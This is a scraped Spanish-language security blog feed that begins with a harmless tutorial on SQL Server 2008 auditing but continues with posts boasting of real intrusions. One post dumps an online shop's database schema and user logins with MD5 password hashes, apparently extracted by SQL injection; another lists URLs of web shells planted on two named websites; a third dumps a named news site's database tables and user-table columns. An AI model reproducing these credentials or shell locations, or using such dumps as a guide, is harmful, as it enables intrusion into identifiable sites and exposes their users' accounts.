&lt;h1&gt;CREAR UNA AUDITORÍA&lt;/h1&gt;Un objeto de auditoría es una colección de una o más acciones individuales o un grupo de acciones que podrán ser rastreadas. Por ejemplo, se puede configurar un objeto de auditoría para identificar todos los logins fallidos. Los eventos se escriben en la localización que se especifique. Se pueden almacenar en un archivo, la bitácora de eventos de aplicaciones o la bitácora de eventos de seguridad.&lt;br /&gt;
&lt;br /&gt;
El objeto de auditoría se puede crear a través del Management Studio (SSMS) o utilizando T-SQL. Desde SSMS se debe presionar el botón de la derecha del mouse sobre la opción New Audit localizada en la carpeta de auditoría bajo el árbol de Seguridad, como se muestra a continuación:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-components-imagefileviewer/communityserver-blogs-components-weblogfiles-00-00-00-89-31/0827.Fig1.png_2D00_550x0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="301" src="http://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-components-imagefileviewer/communityserver-blogs-components-weblogfiles-00-00-00-89-31/0827.Fig1.png_2D00_550x0.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
En la pantalla Create Audit se debe ingresar el nombre del objeto de auditoría, y se debe especificar el destino. Si se indica que el destino será un archivo, hay que especificar la ruta donde será almacenado. Finalmente se debe presionar el botón OK para crear el objeto de auditoría.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/8255.Fig2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/8255.Fig2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Para propósitos de este ejemplo cree un segundo objeto de auditoría e ingrese el nombre &lt;b&gt;"AuditarConsultasTablaEmpleado"&lt;/b&gt;. Seleccione como destino un archivo e indique la ruta donde desee almacenarlo. Ambos objetos estarán localizados bajo la carpeta Audits, como se muestra a continuación. Este objeto de auditoría se utilizará para rastrear las transacciones SELECT realizadas contra la tabla HumanResources.Employee de la base de datos AdventureWorks2008R2.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3554.Fig3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3554.Fig3.png" width="279" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Si desea crear un objeto de auditoría a través de T-SQL lo puede hacer utilizando el comando CREATE SERVER AUDIT. La siguiente consulta crea el objeto &lt;b&gt;"AuditarConsultasTablaEmpleado"&lt;/b&gt;. Esta operación fue realizada anteriormente a través de SSMS.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush:sql"&gt;#
USE master
CREATE SERVER AUDIT [AuditarConsultasTablaEmpleado]
TO FILE  (FILEPATH = N'C:\TEMP');
#&lt;/pre&gt;&lt;br /&gt;
&lt;h1&gt;CREAR Y HABILITAR UNA ESPECIFICACIÓN DE AUDITORÍA A NIVEL DE SERVIDOR&lt;/h1&gt;Una vez se ha creado los objetos de auditoría, el siguiente paso es crear las especificaciones apropiadas de auditoría. Las especificaciones de auditoría le indican al objeto de auditoría lo que debe rastrear. En el caso del objeto de auditoría llamado &lt;b&gt;"AuditarLoginsFallidos"&lt;/b&gt;, debemos crear una especificación que busque los logins que no son exitosos. Para lograrlo debemos seleccionar el botón de la derecha del mouse sobre la carpeta &lt;b&gt;"Server Audit Specifications"&lt;/b&gt; ubicada bajo el árbol de Seguridad.&lt;br /&gt;
&lt;br /&gt;
Asigne a la especificación de auditoría el nombre: &lt;b&gt;"EspecificacionAuditoriaServidor-LoginsFallidos"&lt;/b&gt;. Bajo audit seleccione la opción &lt;b&gt;"AuditarLoginsFallidos"&lt;/b&gt;. Esto asignará la especificación de auditoría &lt;b&gt;"EspecificacionAuditoriaServidor-LoginsFallidos"&lt;/b&gt; al objeto de auditoría &lt;b&gt;"AuditarLoginsFallidos"&lt;/b&gt;. Seleccione el tipo de acción para auditar: &lt;b&gt;"FAILED_LOGIN_GROUP"&lt;/b&gt; y presione OK para crear y asignar el objeto de auditoría.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3005.Fig4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="111" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3005.Fig4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Presione el botón de la derecha del mouse sobre &lt;b&gt;"EspecificacionAuditoriaServidor-LoginsFallidos"&lt;/b&gt; para habilitar la especificación a través de la opción: &lt;b&gt;"Enable Server Audit Specification"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3683.Fig5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="146" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3683.Fig5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Finalmente debe habilitar el objeto de auditoría presionando el botón de la derecha del mouse sobre &lt;b&gt;"AuditarLoginsFallidos"&lt;/b&gt; para habilitar la auditoria a través de la opción Enable Audit como se muestra en la siguiente figura.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/0523.Fig6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="141" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/0523.Fig6.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Si desea crear una especificación de auditoría a nivel de servidor, a través de T-SQL, lo puede hacer utilizando el comando CREATE SERVER AUDIT SPECITICATION. La siguiente consulta crea la especificación de auditoría &lt;b&gt;"EspecificacionAuditoriaServidor-LoginsFallidos"&lt;/b&gt;. Esta operación fue realizada anteriormente a través de SSMS.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush:sql"&gt;#
USE master
CREATE SERVER AUDIT SPECIFICATION [EspecificacionAuditoriaServidor-LoginsFallidos]
FOR SERVER AUDIT [AuditarLoginsFallidos]
ADD (FAILED_LOGIN_GROUP) WITH (STATE = ON)
GO
#&lt;/pre&gt;&lt;br /&gt;
&lt;h1&gt;CREAR Y HABILITAR UNA ESPECIFICACIÓN DE AUDITORÍA A NIVEL DE BASE DE DATOS&lt;/h1&gt;Para crear y habilitar una especificación de auditoría a nivel de base de datos debe expandir la base de datos, en este ejemplo utilice AdventureWorks2008R2, y seleccione con el botón de la derecha del mouse la opción &lt;b&gt;"Audit Specifications"&lt;/b&gt; bajo el árbol de seguridad de la base de datos. Seleccione la opción &lt;b&gt;"New Database Audit Specification"&lt;/b&gt; y asigne un nombre &lt;i&gt;(para propósito de este ejemplo asignaremos el nombre: &lt;b&gt;"EspecificacionAuditoriaDB-ConsultasTablaEmpleado"&lt;/b&gt;)&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/4861.Fig7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="304" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/4861.Fig7.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Como se muestra en la siguiente figura, seleccione la opción &lt;b&gt;"AuditarConsultasTablaEmpleado"&lt;/b&gt; Bajo audit. Esto asignará la especificación de auditoría &lt;b&gt;"EspecificacionAuditoriaDB-ConsultasTablaEmpleado"&lt;/b&gt; al objeto de auditoría &lt;b&gt;"AuditarConsultasTablaEmpleado"&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;&lt;b&gt;NOTA:&lt;/b&gt; La clase de objeto se utiliza para indicar lo que se quiere auditar. Las opciones son: Objeto, Base de datos o Esquema. Seleccione objeto para auditar Tablas, Funciones, Procedimientos Almacenados o Vistas. El nombre del Principal son entidades que pueden solicitar recursos de SQL Server.&lt;/blockquote&gt;&lt;br /&gt;
Para propósitos de este ejemplo, seleccione &lt;b&gt;"SELECT"&lt;/b&gt; en el tipo de acción para auditar; en la clase del objeto seleccione &lt;b&gt;"OBJECT"&lt;/b&gt;; en el nombre del objeto ingrese [HumanResources].[Employee]; en el nombre del Principal ingrese [public] y presione OK para crear y asignar el objeto de auditoría.&lt;br /&gt;
&lt;br /&gt;
Esto permite rastrear las consultas con SELECT que realizan todos los usuarios a la tabla [HumanResources].[Employee].&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3782.Fig8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="64" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3782.Fig8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Presione el botón de la derecha del mouse sobre &lt;b&gt;"EspecificacionAuditoriaDB-ConsultasTablaEmpleado"&lt;/b&gt; para habilitar la especificación a través de la opción: &lt;b&gt;"Enable Database Audit Specification"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/1185.Fig9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/1185.Fig9.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Finalmente debe habilitar el objeto de auditoría presionando el botón de la derecha del mouse sobre &lt;b&gt;"AuditarConsultasTablaEmpleado"&lt;/b&gt; para habilitar la auditoria a través de la opción Enable Audit como se muestra en la siguiente figura.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/7506.Fig10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="154" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/7506.Fig10.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Si desea crear una especificación de auditoría a nivel de base de datos, a través de T-SQL, lo puede hacer utilizando el comando CREATE DATABASE AUDIT SPECITICATION. La siguiente consulta crea la especificación de auditoría &lt;b&gt;"EspecificacionAuditoriaDB-ConsultasTablaEmpleado"&lt;/b&gt;. Esta operación fue realizada anteriormente a través de SSMS.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: sql"&gt;#
USE master
CREATE DATABASE AUDIT SPECIFICATION [DatabaseAuditSpec-EmployeesTable]
FOR SERVER AUDIT [Audit-EmployeeQueries]
ADD (SELECT ON OBJECT::[HumanResources].[Employee] BY [public])
WITH (STATE = ON)
GO
#&lt;/pre&gt;&lt;br /&gt;
&lt;h1&gt;VISUALIZAR LOS REGISTROS DE AUDITORÍA&lt;/h1&gt;Los registros de auditoría pueden ser accedidos a través la opción &lt;b&gt;"View Audit Logs"&lt;/b&gt; o a través de la bitácora de eventos de aplicaciones o de seguridad, dependiendo de dónde se especificó que se almacenaría la auditoría.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3443.Fig11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="214" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/3443.Fig11.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/1007.Fig12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="87" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/1007.Fig12.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Los resultados pueden ser filtrados o inclusive hasta exportados en los siguientes formatos: &lt;i&gt;log&lt;/i&gt;, &lt;i&gt;csv&lt;/i&gt; y &lt;i&gt;txt&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/1854.Fig13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="61" src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-89-31/1854.Fig13.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;h1&gt;CONCLUSIÓN&lt;/h1&gt;La auditoría en SQL 2008 Enterprise es muy poderosa y flexible ya que permite crear auditorías a nivel de servidor o a nivel de base de datos. La configuración es sencilla ya que solo se requiere especificar donde se almacenará la auditoría &lt;i&gt;(en un archivo, la bitácora de eventos de aplicaciones o la bitácora de eventos de seguridad)&lt;/i&gt;, que objeto se desea auditar &lt;i&gt;(Base de datos, Esquema, Tablas, Funciones, Procedimientos Almacenados o Vistas)&lt;/i&gt; y para cual Principal  &lt;i&gt;(entidades que pueden solicitar recursos de SQL Server)&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Leido en:&lt;/b&gt; &lt;a href="http://blogs.technet.com/b/pfelatam/archive/2011/10/22/auditor-237-a-de-seguridad-en-sql-server-2008.aspx"&gt;blogs.technet.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-2257626786513631866?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/BtiwdWd2MJt_qs0O3ZKJHZe-dHA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BtiwdWd2MJt_qs0O3ZKJHZe-dHA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/BtiwdWd2MJt_qs0O3ZKJHZe-dHA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BtiwdWd2MJt_qs0O3ZKJHZe-dHA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/Qo-I0TF4dnk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/2257626786513631866/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/12/auditoria-de-seguridad-en-sql-server.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/2257626786513631866?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/2257626786513631866?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/Qo-I0TF4dnk/auditoria-de-seguridad-en-sql-server.html" title="AUDITORÍA DE SEGURIDAD EN SQL SERVER 2008" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/12/auditoria-de-seguridad-en-sql-server.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Dk4MRX87eip7ImA9WhRREUw.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-4077879364474603903</id><published>2011-11-23T22:09:00.000-08:00</published><updated>2011-11-23T22:09:44.102-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-23T22:09:44.102-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="iSQL" /><category scheme="http://www.blogger.com/atom/ns#" term="Reporte" /><title>VENTAS POR INTERNET? MIS POLAINAS</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-uAgdYLMMbv8/Ts3fapiRiRI/AAAAAAAAANQ/ArKQakAHncI/s1600/Pantallazo+del+2011-11-24+01%253A08%253A18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-uAgdYLMMbv8/Ts3fapiRiRI/AAAAAAAAANQ/ArKQakAHncI/s1600/Pantallazo+del+2011-11-24+01%253A08%253A18.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;TABLAS&lt;/b&gt;&lt;br /&gt;
&lt;pre class="brush:javascript"&gt;Count(table_name) of information_schema.tables Where table_schema=0x73756E72697365 is 24
Table found: cargo
Table found: cart
Table found: categoria
Table found: coleccion
Table found: configuracion_compra
Table found: costo_envio
Table found: item_orden
Table found: item_pedido
Table found: moneda
Table found: orden_compra
Table found: pedido
Table found: producto
Table found: talla
Table found: tallaje
Table found: tbl_cart
Table found: tbl_category
Table found: tbl_costo_envio
Table found: tbl_currency
Table found: tbl_order
Table found: tbl_order_item
Table found: tbl_product
Table found: tbl_shop_config
Table found: tbl_user
Table found: user_sunrise
&lt;/pre&gt;&lt;b&gt;COLUMNAS&lt;/b&gt;&lt;br /&gt;
&lt;pre class="brush:javascript"&gt;Count(column_name) of information_schema.columns Where table_schema=0x73756E72697365 AND table_name=0x757365725F73756E72697365 is 8
Column found: codigo
Column found: nombres
Column found: apellidos
Column found: login
Column found: passw
Column found: fecha_creacion
Column found: ultima_logiada
Column found: cargo
&lt;/pre&gt;&lt;b&gt;REGISTROS&lt;/b&gt;&lt;br /&gt;
&lt;pre class="brush:javascript"&gt;Count(*) of sunrise.user_sunrise is 5
Data Found: login=a
Data Found: passw=21232f297a57a5a743894a0e4a801fc3

Data Found: login=admin
Data Found: passw=5d88365b1893e60e28794e7e6c19c55d

Data Found: login=greenday
Data Found: passw=0cc175b9c0f1b6a831c399e269772661

Data Found: login=mercadeo
Data Found: passw=80735228c8e9b43410f2b207f0e54fb0

Data Found: login=webmaster
Data Found: passw=009c5a054c0cb6c14a194de438ee5552
&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-4077879364474603903?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/I0Ce3Ms3ch0fxSsIzskFp58V7t0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/I0Ce3Ms3ch0fxSsIzskFp58V7t0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/I0Ce3Ms3ch0fxSsIzskFp58V7t0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/I0Ce3Ms3ch0fxSsIzskFp58V7t0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/AcXinsphhHo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/4077879364474603903/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/11/ventas-por-internet-mis-polainas.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4077879364474603903?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4077879364474603903?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/AcXinsphhHo/ventas-por-internet-mis-polainas.html" title="VENTAS POR INTERNET? MIS POLAINAS" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-uAgdYLMMbv8/Ts3fapiRiRI/AAAAAAAAANQ/ArKQakAHncI/s72-c/Pantallazo+del+2011-11-24+01%253A08%253A18.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/11/ventas-por-internet-mis-polainas.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEEQXo4cCp7ImA9WhRREUw.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-4769248510296842775</id><published>2011-11-23T21:45:00.000-08:00</published><updated>2011-11-23T21:46:40.438-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-23T21:46:40.438-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="WebShell" /><title>VARIAS WEBSHELL ON!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.blogas.lt/uploads/t/tranzas/167700.jpg" imageanchor="1"&gt;&lt;img border="0" height="249" src="http://www.blogas.lt/uploads/t/tranzas/167700.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.multipartes.com/imagenes/productos/shell.php"&gt;http://www.multipartes.com/imagenes/productos/shell.php&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.towebs.com/demos_herramientas/rotador_banners/shell.php"&gt;http://www.towebs.com/demos_herramientas/rotador_banners/shell.php&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-4769248510296842775?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/gLP-Hp1DepEqdJJOz_fSdhFlzcw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gLP-Hp1DepEqdJJOz_fSdhFlzcw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/gLP-Hp1DepEqdJJOz_fSdhFlzcw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gLP-Hp1DepEqdJJOz_fSdhFlzcw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/NENP7ImqMKk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/4769248510296842775/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/11/varias-webshell-on.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4769248510296842775?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4769248510296842775?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/NENP7ImqMKk/varias-webshell-on.html" title="VARIAS WEBSHELL ON!" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/11/varias-webshell-on.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMGQXk6cCp7ImA9WhRSGU0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-7865308832065308014</id><published>2011-11-21T12:30:00.000-08:00</published><updated>2011-11-21T12:30:20.718-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-21T12:30:20.718-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="iSQL" /><category scheme="http://www.blogger.com/atom/ns#" term="Reporte" /><title>confidencialcolombia.com NO ES TAN CONFIDENCIAL</title><content type="html">&lt;br/&gt;&lt;br /&gt;
&lt;div class="IMGpequena"&gt;&lt;img height="47" src="http://www.confidencialcolombia.com/images/logos/logo_big.gif" width="400" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Nuevo liderazgo en periodismo digital.&lt;br /&gt;
&lt;br /&gt;
&lt;br/&gt;&lt;br /&gt;
&lt;h1&gt;TABLAS: (sitio_confidencial)&lt;/h1&gt;&lt;pre class='brush:php'&gt;[+] vista 
[+] videografo 
[+] video 
[+] usuario 
[+] tipo_actualizacion 
[+] tendencias_slideshow 
[+] tendencias_home 
[+] tecnologia_slideshow 
[+] tecnologia_home 
[+] sub20_sede 
[+] sub20_partido 
[+] sub20_gol 
[+] sub20_equipo 
[+] seccion 
[+] registro_uniandinos 
[+] politica_slideshow 
[+] politica_home 
[+] opinion_home 
[+] noticia_home 
[+] noticia_asociada 
[+] noticia 
[+] mensaje 
[+] log 
[+] internacional_slideshow 
[+] internacional_home 
[+] indicadores 
[+] gente_slideshow 
[+] vgente_home 
[+] galeria 
[+] fotografo 
[+] foto 
[+] falcon 
[+] estilo_foto 
[+] especial 
[+] elecciones_partidos 
[+] elecciones_medellin 
[+] elecciones_cali 
[+] elecciones_bucaramanga 
[+] elecciones_bogota 
[+] elecciones_barranquilla 
[+] economia_home 
[+] documento 
[+] deportes_slideshow 
[+] deportes_home 
[+] cultura_slideshow 
[+] cultura_home 
[+] contactenos 
[+] comentario 
[+] audiografo 
[+] audio 
[+] amigos 
[+] actualizacion
&lt;/pre&gt;&lt;h1&gt;TABLA: (usuario)&lt;/h1&gt;&lt;pre class="brush:php"&gt;[+] activo
[+] tipo_usuario_id
[+] proveedor_id
[+] cliente_id
[+] grupo_usuarios
[+] tips
[+] direccion_postal
[+] celular
[+] fax
[+] extension
[+] telefono
[+] fecha_nacimiento
[+] password
[+] email
[+] firma
[+] cargo
[+] apellido
[+] nombre
[+] usuario_id
&lt;/pre&gt;&lt;h1&gt;TABLA: usuario: registros&lt;/h1&gt;&lt;img src="http://3.bp.blogspot.com/-32VU_0W3kp0/Tsq0r75jGFI/AAAAAAAAANI/_VGN5Ff3Drw/s1600/Pantallazo%2Bdel%2B2011-11-21%2B15%253A29%253A14.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
